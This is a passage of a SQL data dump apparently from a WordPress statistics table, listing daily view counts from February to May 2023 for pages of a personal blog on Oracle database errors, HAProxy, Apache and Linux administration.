(3863,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-10',8,56),
(3864,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-10',3,583),
(3865,'/about-me/','page','2023-02-10',1,51),
(3866,'/sudo-without-password/','post','2023-02-10',1,603),
(3867,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-02-10',1,150),
(3868,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-02-10',1,97),
(3869,'/how-to-make-apache-web-server-more-secure/','post','2023-02-10',1,305),
(3870,'/setup-high-availability-for-haproxy/','post','2023-02-10',1,615),
(3871,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-02-10',1,104),
(3872,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-02-10',1,60),
(3873,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-02-10',1,312),
(3874,'/change-the-character-set-collation-of-a-table/','post','2023-02-10',1,68),
(3875,'/connection-encryption-in-oracle-database/','post','2023-02-10',3,110),
(3876,'/backup-restore-progress/','post','2023-02-10',1,64),
(3877,'/','home','2023-02-11',143,365),
(3878,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-11',10,56),
(3879,'/','home','2023-02-12',27,365),
(3880,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-12',8,56),
(3881,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-12',1,583),
(3882,'/impdp-errors-ora-02374-ora-12899','post','2023-02-12',1,56),
(3883,'/','home','2023-02-13',264,365),
(3884,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-13',7,56),
(3885,'/about-me/','page','2023-02-13',2,51),
(3886,'/setup-high-availability-for-haproxy/','post','2023-02-13',1,615),
(3887,'/sudo-without-password/','post','2023-02-13',1,603),
(3888,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-02-13',1,312),
(3889,'/how-to-make-apache-web-server-more-secure/','post','2023-02-13',1,305),
(3890,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-14',11,56),
(3891,'/','home','2023-02-14',89,365),
(3892,'/backup-restore-progress/feed/','feed','2023-02-14',1,64),
(3893,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-14',3,583),
(3894,'/','home','2023-02-15',55,365),
(3895,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-15',7,56),
(3896,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-15',1,583),
(3897,'/hosting-a-podcast/feed/','feed','2023-02-15',1,329),
(3898,'/','home','2023-02-16',264,365),
(3899,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-16',8,56),
(3900,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-02-16',1,104),
(3901,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-02-16',1,583),
(3902,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-16',2,583),
(3903,'/','home','2023-02-17',90,365),
(3904,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-17',9,56),
(3905,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-17',1,583),
(3906,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-02-17',1,150),
(3907,'/database-startup-error-fatal-ni-connect-error-12547/feed/','feed','2023-02-17',1,60),
(3908,'/index.php/page/2/','home','2023-02-17',1,365),
(3909,'/page/2/','home','2023-02-17',1,365),
(3910,'/about-me/','page','2023-02-17',2,51),
(3911,'/','home','2023-02-18',116,365),
(3912,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-18',8,56),
(3913,'/','home','2023-02-19',64,365),
(3914,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-19',9,56),
(3915,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-19',2,583),
(3916,'/','home','2023-02-20',225,365),
(3917,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-20',8,56),
(3918,'/about-me/','page','2023-02-20',3,51),
(3919,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-02-20',1,60),
(3920,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-20',6,583),
(3921,'/connection-encryption-in-oracle-database/','post','2023-02-20',1,110),
(3922,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-02-20',1,583),
(3923,'/','home','2023-02-21',126,365),
(3924,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-21',6,56),
(3925,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-21',2,583),
(3926,'/connection-encryption-in-oracle-database/','post','2023-02-21',1,110),
(3927,'/','home','2023-02-23',73,365),
(3928,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-23',5,56),
(3929,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-23',3,583),
(3930,'/','home','2023-02-24',135,365),
(3931,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-24',9,56),
(3932,'/','home','2023-02-25',47,365),
(3933,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-25',8,56),
(3934,'/','home','2023-02-26',180,365),
(3935,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-26',9,56),
(3936,'/','home','2023-02-27',319,365),
(3937,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-27',7,56),
(3938,'/about-me/','page','2023-02-27',1,51),
(3939,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-28',9,56),
(3940,'/','home','2023-02-28',227,365),
(3941,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-28',2,583),
(3942,'/','home','2023-03-01',62,365),
(3943,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-01',8,56),
(3944,'/about-me/','page','2023-03-01',1,51),
(3945,'/','home','2023-03-02',68,365),
(3946,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-02',7,56),
(3947,'/','home','2023-03-03',96,365),
(3948,'/hosting-a-podcast/feed/','feed','2023-03-03',1,329),
(3949,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-03',8,56),
(3950,'/','home','2023-03-04',343,365),
(3951,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-04',8,56),
(3952,'/hosting-a-podcast/feed/','feed','2023-03-04',1,329),
(3953,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-04',4,583),
(3954,'/?action=register','home','2023-03-04',1,365),
(3955,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/?unapproved=207&moderation-hash=685afa9f2ee79ffb78eb5473d3ebc69c','post','2023-03-04',1,583),
(3956,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-05',3,583),
(3957,'/','home','2023-03-05',172,365),
(3958,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-05',9,56),
(3959,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-03-05',1,583),
(3960,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-03-05',1,312),
(3961,'/','home','2023-03-06',204,365),
(3962,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-06',7,56),
(3963,'/about-me/','page','2023-03-06',4,51),
(3964,'/?action=register','home','2023-03-06',1,365),
(3965,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-06',1,583),
(3966,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-07',7,56),
(3967,'/','home','2023-03-07',128,365),
(3968,'/hosting-a-podcast/feed/','feed','2023-03-07',1,329),
(3969,'/setup-high-availability-for-haproxy/','post','2023-03-07',1,615),
(3970,'/','home','2023-03-08',130,365),
(3971,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-08',11,56),
(3972,'/','home','2023-03-09',72,365),
(3973,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-09',2,583),
(3974,'/about-me/','page','2023-03-09',2,51),
(3975,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-09',4,56),
(3976,'/impdp-errors-ora-02374-ora-12899','post','2023-03-09',1,56),
(3977,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-03-09',1,583),
(3978,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-03-09',1,60),
(3979,'/connection-encryption-in-oracle-database/','post','2023-03-09',1,110),
(3980,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-10',9,56),
(3981,'/','home','2023-03-10',92,365),
(3982,'/about-me/','page','2023-03-10',2,51),
(3983,'/setup-high-availability-for-haproxy/','post','2023-03-10',1,615),
(3984,'/','home','2023-03-11',75,365),
(3985,'/setup-high-availability-for-haproxy/','post','2023-03-11',1,615),
(3986,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-03-11',1,150),
(3987,'/database-startup-error-fatal-ni-connect-error-12547/feed/','feed','2023-03-11',1,60),
(3988,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-11',6,56),
(3989,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-03-11',1,583),
(3990,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2023-03-11',1,104),
(3991,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2023-03-11',1,66),
(3992,'/rebuild-and-reorganize-all-indexes-within-a-database/feed/','feed','2023-03-11',1,66),
(3993,'/about-me/','page','2023-03-11',1,51),
(3994,'/','home','2023-03-12',349,365),
(3995,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-12',10,56),
(3996,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-03-12',1,312),
(3997,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-12',1,583),
(3998,'/how-to-make-apache-web-server-more-secure/','post','2023-03-12',1,305),
(3999,'/','home','2023-03-13',209,365),
(4000,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-13',8,56),
(4001,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-13',2,583),
(4002,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-03-13',1,68),
(4003,'/','home','2023-03-14',64,365),
(4004,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-14',9,56),
(4005,'/about-me/','page','2023-03-14',2,51),
(4006,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-03-14',1,68),
(4007,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-14',3,583),
(4008,'/','home','2023-03-15',59,365),
(4009,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-15',8,56),
(4010,'/sudo-without-password/feed/','feed','2023-03-15',1,603),
(4011,'/','home','2023-03-16',414,365),
(4012,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-16',8,56),
(4013,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2023-03-16',1,56),
(4014,'/','home','2023-03-17',54,365),
(4015,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-17',9,56),
(4016,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2023-03-17',1,27),
(4017,'/about-me/','page','2023-03-17',2,51),
(4018,'/hosting-a-podcast/','post','2023-03-17',1,329),
(4019,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2023-03-17',1,97),
(4020,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-03-17',1,583),
(4021,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-18',8,56),
(4022,'/','home','2023-03-18',192,365),
(4023,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-03-18',1,97),
(4024,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-03-18',1,68),
(4025,'/about-me/','page','2023-03-18',3,51),
(4026,'/hosting-a-podcast/feed/','feed','2023-03-18',1,329),
(4027,'/','home','2023-03-19',72,365),
(4028,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-19',10,56),
(4029,'/setup-high-availability-for-haproxy/','post','2023-03-19',1,615),
(4030,'/about-me/','page','2023-03-19',2,51),
(4031,'/','home','2023-03-20',203,365),
(4032,'/about-me/','page','2023-03-20',1,51),
(4033,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-20',7,56),
(4034,'/','home','2023-03-21',44,365),
(4035,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-21',7,56),
(4036,'/about-me/','page','2023-03-21',1,51),
(4037,'/','home','2023-03-22',58,365),
(4038,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-22',9,56),
(4039,'/about-me/','page','2023-03-22',5,51),
(4040,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-22',3,583),
(4041,'/','home','2023-03-23',82,365),
(4042,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-23',6,56),
(4043,'/about-me/','page','2023-03-23',2,51),
(4044,'/','home','2023-03-24',85,365),
(4045,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-24',8,56),
(4046,'/about-me/','page','2023-03-24',1,51),
(4047,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-03-24',1,60),
(4048,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-24',2,583),
(4049,'/connection-encryption-in-oracle-database/','post','2023-03-24',1,110),
(4050,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-03-24',1,150),
(4051,'/index.php/page/2/','home','2023-03-24',1,365),
(4052,'/page/2/','home','2023-03-24',1,365),
(4053,'/','home','2023-03-25',45,365),
(4054,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-25',7,56),
(4055,'/','home','2023-03-26',56,365),
(4056,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-26',9,56),
(4057,'/','home','2023-03-27',39,365),
(4058,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-27',9,56),
(4059,'/hosting-a-podcast/','post','2023-03-27',1,329),
(4060,'/','home','2023-03-28',440,365),
(4061,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-28',9,56),
(4062,'/','home','2023-03-29',189,365),
(4063,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-29',7,56),
(4064,'/about-me/','page','2023-03-29',2,51),
(4065,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-03-29',1,60),
(4066,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-29',1,583),
(4067,'/connection-encryption-in-oracle-database/','post','2023-03-29',1,110),
(4068,'/','home','2023-03-30',65,365),
(4069,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-30',8,56),
(4070,'/','home','2023-03-31',219,365),
(4071,'/impdp-errors-ora-02374-ora-12899/','post','2023-03-31',10,56),
(4072,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-03-31',1,583),
(4073,'/','home','2023-04-01',41,365),
(4074,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-01',9,56),
(4075,'/','home','2023-04-02',160,365),
(4076,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-02',9,56),
(4077,'/setup-high-availability-for-haproxy/','post','2023-04-02',7,615),
(4078,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-02',1,583),
(4079,'/sudo-without-password/','post','2023-04-02',1,603),
(4080,'/','home','2023-04-03',200,365),
(4081,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-03',8,56),
(4082,'/setup-high-availability-for-haproxy/','post','2023-04-03',6,615),
(4083,'/','home','2023-04-04',145,365),
(4084,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-04',10,56),
(4085,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-04',2,583),
(4086,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-04-04',1,60),
(4087,'/connection-encryption-in-oracle-database/','post','2023-04-04',1,110),
(4088,'/about-me/','page','2023-04-04',2,51),
(4089,'/','home','2023-04-05',126,365),
(4090,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-05',7,56),
(4091,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-06',9,56),
(4092,'/','home','2023-04-06',462,365),
(4093,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-06',2,583),
(4094,'/','home','2023-04-07',78,365),
(4095,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-07',1,583),
(4096,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-07',9,56),
(4097,'/','home','2023-04-08',238,365),
(4098,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-08',8,56),
(4099,'/setup-high-availability-for-haproxy/','post','2023-04-08',2,615),
(4100,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-08',1,583),
(4101,'/','home','2023-04-09',304,365),
(4102,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-09',8,56),
(4103,'/setup-high-availability-for-haproxy/','post','2023-04-09',3,615),
(4104,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-10',9,56),
(4105,'/','home','2023-04-10',124,365),
(4106,'/setup-high-availability-for-haproxy/','post','2023-04-10',11,615),
(4107,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-10',2,583),
(4108,'/','home','2023-04-11',199,365),
(4109,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-11',8,56),
(4110,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-11',1,583),
(4111,'/connection-encryption-in-oracle-database/','post','2023-04-11',2,110),
(4112,'/','home','2023-04-12',63,365),
(4113,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-12',7,56),
(4114,'/setup-high-availability-for-haproxy/','post','2023-04-12',6,615),
(4115,'/','home','2023-04-13',47,365),
(4116,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-13',11,56),
(4117,'/setup-high-availability-for-haproxy/','post','2023-04-13',1,615),
(4118,'/sudo-without-password/','post','2023-04-13',1,603),
(4119,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-04-13',1,312),
(4120,'/how-to-make-apache-web-server-more-secure/','post','2023-04-13',1,305),
(4121,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-04-13',1,104),
(4122,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-04-13',1,150),
(4123,'/impdp-errors-ora-02374-ora-12899','post','2023-04-13',1,56),
(4124,'/','home','2023-04-14',60,365),
(4125,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-14',8,56),
(4126,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-04-14',2,60),
(4127,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-14',2,583),
(4128,'/connection-encryption-in-oracle-database/','post','2023-04-14',2,110),
(4129,'/setup-high-availability-for-haproxy/','post','2023-04-14',1,615),
(4130,'/','home','2023-04-15',314,365),
(4131,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-15',7,56),
(4132,'/setup-high-availability-for-haproxy/','post','2023-04-15',2,615),
(4133,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-04-15',2,60),
(4134,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-15',2,583),
(4135,'/connection-encryption-in-oracle-database/','post','2023-04-15',2,110),
(4136,'/','home','2023-04-16',112,365),
(4137,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-16',8,56),
(4138,'//blog/','home','2023-04-16',1,365),
(4139,'/','home','2023-04-17',235,365),
(4140,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-17',7,56),
(4141,'/','home','2023-04-18',148,365),
(4142,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-18',8,56),
(4143,'/','home','2023-04-19',94,365),
(4144,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-19',8,56),
(4145,'/?action=register','home','2023-04-19',1,365),
(4146,'/','home','2023-04-20',307,365),
(4147,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-20',8,56),
(4148,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-04-20',1,60),
(4149,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-20',1,583),
(4150,'/connection-encryption-in-oracle-database/','post','2023-04-20',1,110),
(4151,'/','home','2023-04-21',67,365),
(4152,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-21',7,56),
(4153,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-21',2,583),
(4154,'/','home','2023-04-22',37,365),
(4155,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-22',8,56),
(4156,'/','home','2023-04-23',40,365),
(4157,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-23',6,56),
(4158,'/','home','2023-04-24',188,365),
(4159,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-24',8,56),
(4160,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-25',9,56),
(4161,'/','home','2023-04-25',168,365),
(4162,'/','home','2023-04-26',35,365),
(4163,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-26',7,56),
(4164,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-26',2,583),
(4165,'/setup-high-availability-for-haproxy/','post','2023-04-26',1,615),
(4166,'/sudo-without-password/','post','2023-04-26',1,603),
(4167,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-04-26',1,312),
(4168,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-27',7,56),
(4169,'/','home','2023-04-27',73,365),
(4170,'/','home','2023-04-28',61,365),
(4171,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-28',8,56),
(4172,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-28',2,583),
(4173,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-04-28',1,583),
(4174,'/','home','2023-04-29',118,365),
(4175,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-29',10,56),
(4176,'/hosting-a-podcast/feed/','feed','2023-04-29',1,329),
(4177,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2023-04-29',1,66),
(4178,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-04-29',1,583),
(4179,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-04-29',1,583),
(4180,'/','home','2023-04-30',90,365),
(4181,'/about-me/','page','2023-04-30',1,51),
(4182,'/impdp-errors-ora-02374-ora-12899/','post','2023-04-30',6,56),
(4183,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2023-04-30',1,312),
(4184,'/connection-encryption-in-oracle-database/','post','2023-04-30',1,110),
(4185,'/rebuild-and-reorganize-all-indexes-within-a-database/feed/','feed','2023-04-30',1,66),
(4186,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-01',8,56),
(4187,'/','home','2023-05-01',178,365),
(4188,'/hosting-a-podcast/','post','2023-05-01',2,329),
(4189,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-05-01',3,312),
(4190,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2023-05-01',1,56),
(4191,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-05-01',1,68),
(4288,'/about-me/','page','2023-05-01',1,51),
(4289,'/sudo-without-password/','post','2023-05-01',1,603),
(4290,'/setup-high-availability-for-haproxy/','post','2023-05-01',1,615),
(4291,'/homepage/','page','2023-05-01',1,365),
(4295,'/how-to-make-apache-web-server-more-secure/','post','2023-05-01',2,305),
(4296,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-01',1,583),
(4308,'/','home','2023-05-02',136,647),
(4309,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-05-02',1,97),
(4310,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-02',7,56),
(4311,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-05-02',1,150),
(4312,'/how-to-make-apache-web-server-more-secure/feed/','feed','2023-05-02',1,305),
(4313,'/setup-high-availability-for-haproxy/','post','2023-05-02',2,615),
(4314,'/sudo-without-password/','post','2023-05-02',1,603),
(4315,'/how-to-make-apache-web-server-more-secure/','post','2023-05-02',1,305),
(4316,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2023-05-02',1,104),
(4317,'/homepage/','page','2023-05-02',3,365),
(4318,'/about-me/','page','2023-05-02',1,51),
(4319,'/','home','2023-05-03',94,647),
(4320,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-03',3,56),
(4321,'/backup-restore-progress/','post','2023-05-03',1,64),
(4322,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-05-03',1,104),
(4323,'/one-way-to-prevent-ddos-attacks-in-wordpress/feed/','feed','2023-05-03',1,150),
(4324,'/about-me/','page','2023-05-03',1,51),
(4325,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/feed/','feed','2023-05-03',1,27),
(4326,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-03',1,583),
(4327,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-05-03',1,583),
(4328,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-04',1,583),
(4329,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-04',4,56),
(4330,'/','home','2023-05-04',366,647),
(4331,'/change-the-character-set-collation-of-a-table/','post','2023-05-04',1,68),
(4332,'/','home','2023-05-05',168,647),
(4333,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-05',7,56),
(4334,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-05',1,583),
(4335,'/','home','2023-05-06',365,647),
(4336,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-06',7,56),
(4337,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-07',8,56),
(4338,'/','home','2023-05-07',617,647),
(4339,'/how-to-make-apache-web-server-more-secure','post','2023-05-07',1,305),
(4340,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password','post','2023-05-07',1,583),
(4341,'/hosting-a-podcast','post','2023-05-07',1,329),
(4342,'/fedora-33-problem-with-broadcom-wifi-device','post','2023-05-07',1,312),
(4343,'/how-to-make-apache-web-server-more-secure/','post','2023-05-07',1,305),
(4344,'/setup-high-availability-for-haproxy','post','2023-05-07',1,615),
(4345,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-07',1,583),
(4346,'/sudo-without-password','post','2023-05-07',1,603),
(4347,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-05-07',1,312),
(4348,'/hosting-a-podcast/','post','2023-05-07',1,329),
(4349,'/setup-high-availability-for-haproxy/','post','2023-05-07',1,615),
(4350,'/sudo-without-password/','post','2023-05-07',1,603),
(4351,'/','home','2023-05-08',430,647),
(4352,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-08',8,56),
(4353,'/about-me/','page','2023-05-08',5,51),
(4354,'/how-to-make-apache-web-server-more-secure/','post','2023-05-08',2,305),
(4355,'/sudo-without-password/','post','2023-05-08',1,603),
(4356,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-08',1,583),
(4357,'/hosting-a-podcast/','post','2023-05-08',1,329),
(4358,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-05-08',1,312),
(4359,'/connection-encryption-in-oracle-database/','post','2023-05-08',1,110),
(4360,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-05-08',1,97),
(4361,'/change-the-character-set-collation-of-a-table/','post','2023-05-08',1,68),
(4362,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-05-08',1,104),
(4363,'/','home','2023-05-09',295,647),
(4364,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-09',7,56),
(4365,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-09',1,583),
(4366,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-10',8,56),
(4367,'/','home','2023-05-10',147,647),
(4368,'/','home','2023-05-11',85,647),
(4369,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-11',9,56),
(4370,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-05-11',1,104),
(4371,'/about-me/','page','2023-05-11',2,51),
